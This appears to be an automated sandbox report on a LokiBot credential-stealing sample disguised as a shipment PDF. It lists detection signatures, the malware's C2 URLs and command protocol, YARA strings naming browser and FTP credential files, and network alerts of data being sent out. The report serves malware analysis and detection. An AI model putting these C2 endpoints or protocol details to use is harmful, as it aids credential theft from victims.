Edit tour

Windows Analysis Report
Shipment Delivery No DE0093002-PDF.exe

Overview

General Information

Sample name:	Shipment Delivery No DE0093002-PDF.exe
Analysis ID:	1622495
MD5:	3be7ec7542039a96c3ab2fa71914aa9a
SHA1:	51afd12349217e0650067bd70a97187d90431099
SHA256:	0d0fa16ed013f13274881d27fd1cb0892e030bc9d0c274ca87ac4afef1d14080
Tags:	exeLokiuser-lowmal3
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Shipment Delivery No DE0093002-PDF.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe" MD5: 3BE7EC7542039A96C3AB2FA71914AA9A)

svchost.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Shipment Delivery No DE0093002-PDF.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe" MD5: 3BE7EC7542039A96C3AB2FA71914AA9A)

svchost.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000003.00000002.2938265324.0000000002A21000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4b40b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x13731d:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 7536	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 7536	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 7536	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 7536	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x704f5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.svchost.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.svchost.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.2.svchost.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.svchost.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.svchost.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", CommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", CommandLine|base64offset|contains: b, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", ParentImage: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe, ParentProcessId: 7468, ParentProcessName: Shipment Delivery No DE0093002-PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", ProcessId: 7484, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", CommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", CommandLine|base64offset|contains: b, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", ParentImage: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe, ParentProcessId: 7468, ParentProcessName: Shipment Delivery No DE0093002-PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe", ProcessId: 7484, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:17.542873+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:18.709316+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49732	104.21.48.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:16.802412+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.599802+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.48.1	80	TCP
